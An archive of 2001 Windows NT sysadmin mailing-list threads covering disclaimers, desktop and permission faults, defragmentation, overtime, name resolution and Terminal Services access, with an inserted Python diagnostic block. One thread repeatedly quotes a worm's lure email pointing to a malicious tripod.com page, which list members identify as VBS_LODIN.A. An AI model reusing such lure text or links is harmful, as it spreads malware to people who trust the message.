Title: Message About as silly, and therefore has probably been used, as the hacker argument that says "well, their system doesn't say "No unauthorized personnel", it says "Welcome". -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 9:39 AM To: NT System Admin Issues Subject: RE: OT E-Mail Disclaimers I agree with the majority on this one. Disclaimers are pretty obnoxious. Yet I was asked to implement one. However, I don't think the reason for most organizations using disclaimers is to completely cover their a$$ in a legal situation. I would imagine it's just one more thing an organization can do to help. There are so many loopholes out there that everyone has to be sure to cover all bases. If one didn't have a disclaimer, a defending attorney would probably use that fact in their argument..."My client was unaware that the plans for the next neutron bomb were confidential and not to be forwarded to friends and family overseas." Just my .02 Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] -Original Message- From: Blake R. Fowkes [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 8:16 AM To: NT System Admin Issues Subject: RE: OT E-Mail Disclaimers We have everyone put the following disclaimer on anything that is not personal. It is what our legal department came up with. CONFIDENTIALITY NOTICE The information contained in this electronic mail is strictly confidential, attorney work product; or subject to the Attorney-Client Privilege. This transmission is intended only for the addressee(s) named. You are hereby notified that any use, disclosure, dissemination, distribution, copying, or taking of any action because of this information by any party other than the addressee(s), is strictly prohibited.
If you have received this transmission in error, please notify the sender by email, or call (512) 255- immediately. Thanks, Blake Fowkes Waid and Associates -Original Message- From: Banyas, Pat F. Civ [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 11:21 AM To: NT System Admin Issues Subject: RE: OT E-Mail Disclaimers Thanks to all who replied. We are reviewing this topic since users are allowed to send and receive personal mail as well as Official mail due to our remote location. While it may have no legal standpoint at this time, it does make the point to those who receive it that the disclaimer is drawing their attention to something they should be aware of. I realize no one likes them, I was just looking for some examples since I have seen quite a few at the bottom of emails sent to this list. Thanks Pat Banyas -Original Message- From: Waters, Jeff [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 11:08 AM To: NT System Admin Issues Subject: RE: OT E-Mail Disclaimers They are just plain evil, I would highly recommend going over to the Exchange list and asking the question. Just put on your flame suit first. Jeff -Original Message- From: Erik Sojka [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 11:03 AM To: NT System Admin Issues Subject: RE: OT E-Mail Disclaimers We should discuss this on the Swynk Exchange list (ls.swynk.com) They love discussing email disclaimers and do it quite often. -Original Message- From: Correa, Andre [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 11:03 AM To: NT System Admin Issues Subject: RE: OT E-Mail Disclaimers Do they serve some legal purpose? -Original Message- From: Kelly Borndale [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 10:45 AM To: NT System Admin Issues Subject: Re: OT E-Mail Disclaimers They are annoying, and they mean little to nothing. K.Borndale [EMAIL PROTECTED] -home email - Original Message - From: Banyas, Pat F.
Civ To: NT System Admin Issues Sent: Wednesday, August 29, 2001 10:33 AM Subject: OT E-Mail Disclaimers
RE: Desktop icons not responding
how about just rebooting? -Original Message- From: Steve More [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 12:38 PM To: NT System Admin Issues Subject: RE: Desktop icons not responding Check to see if Explorer.exe is running, if not someone is playing with you. -Original Message- From: Myung Bang [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 12:36 PM To: NT System Admin Issues Subject: Re: Desktop icons not responding Well, I can not delete any icons on the desktop. Delete key doesn't work. I brought up the Display Properties and only odd thing I can see is, Background Pattern is empty and Edit Pattern button is gray out. All other seems ok. Maybe this Background Pattern has something to do with my problem. "Rogers, Jeff L (OM)" wrote: that's why I suggested checking to see what the desktop properties were, what background, wallpaper, etc. -Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 14:13 To: NT System Admin Issues Subject: RE: Desktop icons not responding Sounds like you have been tricked. Did someone paste a desk top screen shot on your machine??. Try click and hit delete. Mal -Original Message- From: Myung Bang [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 1:07 PM To: NT System Admin Issues Subject: Re: Desktop icons not responding Event log doesn't tell me anything. No error messages. Mouse does not function on the desktop at all, so, right mouse click on the desktop doesn't do anything. But if I open any application, it will work within those applications Sean Martin wrote: Sounds like a problem I was having with our Exchange server awhile back due to low virtual memory. What does the event log tell you? Our problem was related to GroupShield, so I uninstalled it and replaced with Antigen :o) Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc.
3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] -Original Message- From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 10:36 AM To: NT System Admin Issues Subject: RE: Desktop icons not responding Interesting. Just for grins: what happens when you right-click the "desktop?" What is the wallpaper or background right now? -Original Message- From: Myung Bang [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 13:31 To: NT System Admin Issues Subject: Desktop icons not responding Hello, I am having an interesting problem on NT 4.0 SP6a machine. I can not click icons on the desktop using the mouse. I can tab through using keyboard and access them, but mouse click doesn't work. I can, however, use mouse clicks on Start menus. Mouse click just would not work on desktop icons. Also, it won't work on newly created icons, neither. Anyone seen this behavior before?? Thanks. Myung http://www.sunbelt-software.com/ntsysadmin_list_charter.htm -- ** Email: [EMAIL PROTECTED] Phone: (757) 269-7158 Fax: (757) 269-7053 Pager: (757) 888-7561 ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Domain Admin cannot use admin tools
Title: RE: Domain Admin cannot use admin tools Have you rebooted yet? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 6:57 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks again. No, system error 5 (access denied) is returned. I'm stumped! [EMAIL PROTECTED] 08/28/01 09:41AM Can you add a dummy user from the command line using NET USER command? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem. [EMAIL PROTECTED] 08/28/01 09:19AM trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain... === Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] === -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before?
Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Domain Admin cannot use admin tools
Frustrated screenwriter? Nice to know some things never change - when in doubt - reboot.
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 7:56 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools
Ok gang. Thanks for all the help both on and off list. The answer had to be in the Netlogon service, according to Novell. I tried to reboot the PDC, but was told I had no rights to do so. AHA you scoundrel, says I. I'll show you who's in charge here!. Warily pressing the Big Red Button, the administrator jumps quickly backward, allowing the defiant machine to die gracefully. Rise and Heal thyself! I yelled. Slowly, the beast began to stir, eventually coming to full life and, having been beaten into submission, was henceforth properly responsive to all demands made of it.
Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522
[EMAIL PROTECTED] 08/28/01 09:57AM
Thanks again. No, system error 5 (access denied) is returned. I'm stumped!
[EMAIL PROTECTED] 08/28/01 09:41AM
Can you add a dummy user from the command line using NET USER command?
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools
Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem.
[EMAIL PROTECTED] 08/28/01 09:19AM
trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain...
=== Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] ===
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools
Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before?
Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522
RE: Domain Admin cannot use admin tools
yuk. good luck
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:25 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools
Yeah. Lost my head. It's just one of those days. They just laid off 288 out of 700 people, and two days later they announce ANOTHER 300 million dollar deficit, which will require another 5-7% layoff. So much for government jobs being secure! I just had to do something out of the ordinary to vent!
[EMAIL PROTECTED] 08/28/01 11:06AM
Frustrated screenwriter? Nice to know some things never change - when in doubt - reboot.
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 7:56 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools
Ok gang. Thanks for all the help both on and off list. The answer had to be in the Netlogon service, according to Novell. I tried to reboot the PDC, but was told I had no rights to do so. AHA you scoundrel, says I. I'll show you who's in charge here!. Warily pressing the Big Red Button, the administrator jumps quickly backward, allowing the defiant machine to die gracefully. Rise and Heal thyself! I yelled. Slowly, the beast began to stir, eventually coming to full life and, having been beaten into submission, was henceforth properly responsive to all demands made of it.
Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522
[EMAIL PROTECTED] 08/28/01 09:57AM
Thanks again. No, system error 5 (access denied) is returned. I'm stumped!
[EMAIL PROTECTED] 08/28/01 09:41AM
Can you add a dummy user from the command line using NET USER command?
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools
Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem.
[EMAIL PROTECTED] 08/28/01 09:19AM
trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain...
=== Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] ===
-Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools
Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before?
Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522
RE: RE: Defrag: is it necessary for NTFS?
I haven't as yet defragged my servers, which probably need it more than my desktops. But I can definitely tell when I log into a desktop that needs defragging. I can hear the drives churning. Desktops are all nt4 w/ ntfs.
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 7:45 AM To: NT System Admin Issues Subject: Re:RE: Defrag: is it necessary for NTFS?
I have experienced slow data access from badly fragmented NTFS drives. I don't have any recent data nor do I have hard data from a test environment. I do know that after defragging my users' hard drives their computer response times more than doubled. IE it took less than half the previous time to open the same files. ralph
Reply Separator Subject: RE: Defrag: is it necessary for NTFS? Author: NT System Admin Issues [EMAIL PROTECTED] Date: 08/27/2001 2:22 PM
but when the drives get full, the whole system bogs down and then to defrag can take forever and no one of the defrag tools do a good job when you have reached this point. So my humble opinion is to do it and do it frequently using Diskeeper Frag Guard on all the time while there is lots of space to operate in. Erich
-Original Message- From: Josu Lekaroz [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:16 PM To: NT System Admin Issues Subject: Re: Defrag: is it necessary for NTFS?
Maybe the benefits exist but I have never had to defrag a drive on NT. Perhaps someone has benchmarked drives before and after defragmentation. It'd be nice to see results. Regards josu
RE: What do you get for Over Time
I think there's a whole bunch of exceptions, and unfortunately for many of us, I think IT got to be an exception. Of course that may have been on the state level, although I could swear it was the National Labor Relations Board that audited our company at the time.
-Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 9:51 AM To: NT System Admin Issues Subject: RE: What do you get for Over Time
I've been a salaried, non-exempt employee for the past 3 years and I've always gotten time and a half for any over-time I put in. However, our HR person recently contacted the Department of Labor and found out some interesting facts. Anyone who is not in a position where 2 or more people work directly under them, is considered a non-exempt employee (at least in our case).
Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED]
-Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 8:29 AM To: NT System Admin Issues Subject: RE: What do you get for Over Time
I didn't think you did, I was pointing out the math. Greg
-Original Message- From: Seth M. Kusiak [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 12:17 PM To: NT System Admin Issues Subject: Re: What do you get for Over Time
It was ONLY an example. I don't make 10K a year.
Greg Page writes:
If you made $10,000 a year that would be $5.00 an hour. I haven't had an overtime paying job in years but we've always managed to snag lots of extra time off when we can. The nature of the IT beast is that sometimes there is OT involved and long nights and weekends. Just part of the job. Greg
-Original Message- From: Seth M. Kusiak [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 9:25 AM To: NT System Admin Issues Subject: Re: What do you get for Over Time
I'm salaried, but if I work over 45 hours in a week then for each hour that I work past 45, I get half of my base rate. Example: If I make $10,000 a year and my hourly rate is $10.00, for each hour that I work past 45, I would get $5.00 an hour that is paid quarterly. I really like this because I usually end up with a few thousand extra each quarter. ~Seth
Mathews, James E. writes:
I was wondering if anyone has any policies set up for Over Time. The reason I ask is one of the other network guys and myself have put in about 40 hours over time this month and we receive nothing for it. Just wondering what policies are set up at other companies to compensate for over time. We consistently work about 8-12 hours over a month and we get no time off or anything for this. Management keeps telling us it is just part of our job and we can not get any comp time even though we are only scheduled for 40 hours a week.
DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error.
RE: Hi !
Hey Roger - is this it?
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi !
Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too.
RE: Hi !
Does it have a name yet?
-Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:17 PM To: NT System Admin Issues Subject: RE: Hi !
Yes, this is the one
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:13 PM To: NT System Admin Issues Subject: RE: Hi !
Hey Roger - is this it?
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi !
Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too.
RE: Hi !
thanks
-Original Message- From: Bill Higgins [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:27 PM To: NT System Admin Issues Subject: RE: Hi !
According to TrendMicro... VBS_LODIN.A http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LODING.A
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 14:25 To: NT System Admin Issues Subject: RE: Hi !
Does it have a name yet?
-Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:17 PM To: NT System Admin Issues Subject: RE: Hi !
Yes, this is the one
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:13 PM To: NT System Admin Issues Subject: RE: Hi !
Hey Roger - is this it?
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi !
Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too.
RE: Hi !
yes I have.
-Original Message- From: Stephen Berg [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:07 PM To: NT System Admin Issues Subject: Re: Hi !
Has anyone sent an email to Tripod.com to ask them to shut down that web page?
On Mon, 27 Aug 2001 [EMAIL PROTECTED] wrote:
Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too.
RE: NetBIOS name resolves to domain name
That's how my setup was, and when my internet connection failed I'd have problems. So now I have DNS set up internally too, even if it's only the 3rd option.
-Original Message- From: Niki Blowfield [mailto:[EMAIL PROTECTED]] Sent: Friday, August 24, 2001 7:11 AM To: NT System Admin Issues Subject: RE: NetBIOS name resolves to domain name
The domain that is being resolved, servername.co.uk, is not one of our servers. We don't have any DNS servers on our LAN, we use our ISP's
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: 24 August 2001 14:36 To: NT System Admin Issues Subject: Re: NetBIOS name resolves to domain name
Niki: The ping difference means that DNS (or the hosts file) is resolving the one server and WINS (lmhosts file) the other. For example, I have 2 servers (server01 and server02). I have a DNS namespace of div1.company.com. I have both valid WINS server(s) and DNS server(s). The 1st server, server01 is registered in DNS and the 2nd is not. My client is setup to use DNS to first resolve the name. When I ping server01, it replies server01.div1.company.com [192.168.100.50], when I ping server02 DNS does not have this host name so WINS ends up replying with server02 [192.168.100.55]. Either way should work and would not matter to Exchange. I would check to make sure both servers are properly registered in WINS. Go to the CMD prompt and type:
    NBTSTAT -a server01 (your server name goes here)
You should get a listing at a minimum similar to this:
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    SERVER02       <00>  UNIQUE      Registered
    DOM01          <00>  GROUP       Registered
    SERVER02       <20>  UNIQUE      Registered
    MAC Address = 99-99-99-99-99-99
The first 00 is the unique computername registration by the workstation service. The other 00 group is the domain name registered saying that this computer is a member of this domain or workgroup. The 20 unique is registered by the server service I believe. You may certainly have other entries besides these, especially if the one server is the PDC. I would double check your WINS settings and make sure the servers are both registered properly in WINS. Whether the ping to a server is answered by WINS or DNS should not matter to the NetBIOS resolution for the Exchange server you are trying to add. Pinging any server in my organization will always give you a servername.div1.company.com answer to the ping. Thanks
Niki Blowfield niki.blowfield@partit To: NT System Admin Issues ion.co.uk [EMAIL PROTECTED] cc: 08/24/2001 07:56 AM Subject: Netbios name resolves to domain name Please respond to NT System Admin Issues
Hi We have an NT4 Domain, with one Exchange 5.5 server on the PDC. I have attempted to install another Exchange server into the site, but the installation fails at the end, with an error asking me to check if the directory service is started. The service is started, so upon investigation of technet, it mentions name resolution on the two servers. I have checked, and when I ping the server name of the server I'm trying to install, it resolves it to a domain name. e.g.;
    ping NEWEXCHSERVER
    pinging NEWEXCHSERVER.CO.UK [201.167.xxx.xxx] etc etc
Whereas, if I ping the other way, it works okay. e.g.
    ping EXISTINGEXCSERVER
    pinging EXISTINGEXCSERVER [192.168.2.25] etc
I have entered the new server into the lmhosts file of the exchange server and rebooted, but no difference. could this be the problem? if so, any ideas on a resolution Nik
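The two checks discussed in this thread, written out as an added example that is not part of any poster's message: it reads the first line of ping output to tell whether a short server name was answered with a DNS suffix appended and whether the address lies outside the private LAN ranges, and it reads an nbtstat -a name table to confirm the <00> and <20> UNIQUE registrations. The function names and the address 203.0.113.10 are constructed for illustration; the name table is the one quoted above.

```python
import ipaddress
import re

# RFC 1918 private ranges; the LAN in the thread is 192.168.x.x.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# First line of ping output: "Pinging <name> [<address>] ..."
PING_RE = re.compile(r"pinging\s+(\S+)\s+\[(\d{1,3}(?:\.\d{1,3}){3})\]", re.I)

# One row of the nbtstat -a table: NAME <suffix> UNIQUE|GROUP Status
NBT_ROW_RE = re.compile(
    r"^[ \t]*(\S+)[ \t]+<([0-9A-Fa-f]{2})>[ \t]+(UNIQUE|GROUP)[ \t]+(\S+)[ \t]*$",
    re.M)


def classify_ping(short_name, ping_header):
    """Report how a short name was answered, per the thread's rule of thumb:
    a reply carrying a DNS suffix came from DNS/hosts, a bare name from
    WINS/lmhosts/broadcast."""
    m = PING_RE.search(ping_header)
    if m is None:
        raise ValueError("no 'Pinging name [address]' header found")
    answered = m.group(1)
    addr = ipaddress.ip_address(m.group(2))
    qualified = answered.lower() != short_name.lower()
    return {
        "answered_as": answered,
        "resolver": "dns" if qualified else "netbios",
        # False means the name led to a host outside the private LAN ranges.
        "on_lan": any(addr in net for net in RFC1918),
    }


def parse_name_table(nbtstat_output):
    """Return (name, suffix, type, status) tuples from nbtstat -a output."""
    return [(name.upper(), suffix.upper(), kind, status)
            for name, suffix, kind, status in NBT_ROW_RE.findall(nbtstat_output)]


def missing_registrations(nbtstat_output, computer):
    """List the workstation <00> and server <20> UNIQUE entries that are
    not shown as Registered for the given computer name."""
    registered = {(n, s, k) for n, s, k, status in parse_name_table(nbtstat_output)
                  if status == "Registered"}
    wanted = [(computer.upper(), "00", "UNIQUE"),
              (computer.upper(), "20", "UNIQUE")]
    return ["%s <%s> %s" % w for w in wanted if w not in registered]


# Name table as quoted in the thread.
NBTSTAT_SAMPLE = """\
       NetBIOS Remote Machine Name Table
   Name               Type         Status
---------------------------------------------
SERVER02       <00>  UNIQUE      Registered
DOM01          <00>  GROUP       Registered
SERVER02       <20>  UNIQUE      Registered
MAC Address = 99-99-99-99-99-99
"""

# Constructed ping headers modelled on the thread; 203.0.113.10 is a
# documentation address standing in for the masked 201.167.xxx.xxx.
PING_SAMPLES = {
    "NEWEXCHSERVER": "Pinging NEWEXCHSERVER.CO.UK [203.0.113.10] with 32 bytes of data:",
    "EXISTINGEXCSERVER": "Pinging EXISTINGEXCSERVER [192.168.2.25] with 32 bytes of data:",
}

if __name__ == "__main__":
    for name, header in PING_SAMPLES.items():
        print(name, classify_ping(name, header))
    print("missing:", missing_registrations(NBTSTAT_SAMPLE, "SERVER02"))
```

A short internal name that comes back with a public suffix and an off-LAN address means the ISP's resolver answered for it, so traffic meant for the internal server would go to someone else's host.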
RE: Scheduling a Defrag in 2000!
I thought the guys at sysinternals had a way to do this.
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 8:54 AM To: NT System Admin Issues Subject: Re: Scheduling a Defrag in 2000!
There is no default way. You cannot schedule it in the task scheduler and you have to be an admin to run it. A couple solutions one go and Diskeeper or some other third party app. Also I have found freeware called Autodefrag where you can through the task scheduler but the user will have to have admin privileges. You can find autodefrag at www.morphasys.com.
RE: Access to Terminal Server
then go thru www.sunbelt-software.com
-Original Message- From: David N. Precht [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 10:34 AM To: NT System Admin Issues Subject: RE: Access to Terminal Server
Would be nice to see , yet I get : The page cannot be displayed Gotta love it .
-Original Message- From: Sullivan, Glenn [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 09:58 To: NT System Admin Issues Subject: RE: Access to Terminal Server
Go to http://www.win2knews.com and sign up... Glenn Sullivan, MCSE+I MCDBA David Clark Company Inc.
-Original Message- From: Correa, Andre [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 9:48 AM To: NT System Admin Issues Subject: RE: Access to Terminal Server
I have been looking for that very piece of information. How do I sign up for the W2K news email letter?
-Original Message- From: John Brozycki [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 9:21 AM To: NT System Admin Issues Subject: RE: Access to Terminal Server
If you get Stu's W2K news email newsletter he just sent one out this morning that had a snippet from Mark Minasi explaining how to do this very thing. Here's the quote from Mark Minasi:
How to let Non-Domain Admins connect to a Win2K Server via Terminal Services in Remote Admin mode? Here's what Mark Minasi found out: I really like Terminal Services for Windows 2000 in the "Remote Administration" mode; it lets up to two people use Terminal Services to remotely control a Windows 2000 Server, and doesn't require me to buy any Terminal Server client licenses. But when you select "Remote Administration" mode for Terminal Services, then Terminal Services only lets members of the Domain Admins group log into Terminal Services. I wanted to let regular old users log in, but didn't know how. While teaching a class for a large communications company this month, I found out how.
Open Terminal Services Configuration (it's in Administrative Tools)
In the command pane (the left-hand pane of the MMC console), click on "Connections."
In the right-hand pane, you'll see an icon representing a connection (a hard disk atop a network connection) and the words "RDP-Tcp," "tcp," and "Microsoft RDP 5.0."
Double-click the icon to bring up its Properties dialog, or just right-click the icon and choose "Properties."
You'll see a property page labeled "RDP-Tcp Properties." Click the "Permissions" tab. Note that right now, the tab shows only the System account and the local Administrators group.
Add any person or group that you like, and they'll be able to log onto the server via Terminal Services.
At 11:45 AM 8/17/2001 -0400, you wrote:
Sorry for not mentioning this the first time, but Terminal Services is in Admin Mode. In order to accomplish this before, I had to give others Admin rights. Now I don't have to, I can just give them through policies what they need to do. Thanks. Terry Caleb
-- Original Message -- From: "Kevin Miller" [EMAIL PROTECTED] Reply-To: "NT System Admin Issues" [EMAIL PROTECTED] Date: Fri, 17 Aug 2001 11:34:25 -0700
Checking I have a locked down Demo account with no rights logging into a remote mode TS? I think anyone can login as long as they have the check box done.. Or am I just smoking crack?
Kevinm QWSZC, VRY+Y, NFH, SAD-VF, DERSDESDFG ~~~More letters after my name makes me Smarter.~~~ please respond back to rent this ad space for your needs
-Original Message- From: Kevin Lundy [mailto:[EMAIL PROTECTED]] Sent: Friday, August 17, 2001 8:31 AM To: NT System Admin Issues Subject: RE: Access to Terminal Server
I think the issue may be in how Terry originally installed TS - in remote admin mode maybe instead of application server? If remote admin mode, I don't think there is any way around the admin permissions - that's one of MS's way of ensuring you don't bypass proper licensing.
-Original Message- From: Kevin Miller [mailto:[EMAIL PROTECTED]] Sent: Friday, August 17, 2001 2:28 PM To: NT System Admin Issues Subject: RE: Access to Terminal Server
Just give the user logon to TS rights in their AD profile.
Kevinm QWSZC, VRY+Y, NFH, SAD-VF, DERSDESDFG ~~~More letters after my name makes me
RE: Changing Mappings after server re-name
I think what they're trying to say is it's difficult to query each machine, get the shares, and then replace them. You might end up spending more time trying to create a sophisticated script than just trying to standardize using, for example, ifmember. How many users are we talking about?
-Original Message- From: Tom Grabowski [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 1:20 PM To: NT System Admin Issues Subject: RE: Changing Mappings after server re-name
You have all been a great help. Yes I know what net use * /delete does. And it is exactly what I don't want to do. We have users manually mapped because that is the way it thank you for your thoughtful insight on logon scripts, hmmm, but I thought that was what my initial request stated; Is there a way through 2000 logon scripts or, 3rd party software, that upon logon the users drive mappings can be reviewed and through the use of variables accomplish something like this; and lastly thank you for the Just use net use /delete n: I will go to each workstation find out their mapped drives to the old server and create individual logon scripts for each different development group or department. Trying to eliminate the sneaker net through Logon Scripts Thanks anyway for the assists. If I find a way to do what I want I will post it, maybe what we have here is a failure to communicate.
-Original Message- From: Tom Grabowski [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 9:59 AM To: NT System Admin Issues Subject: Changing Mappings after server re-name
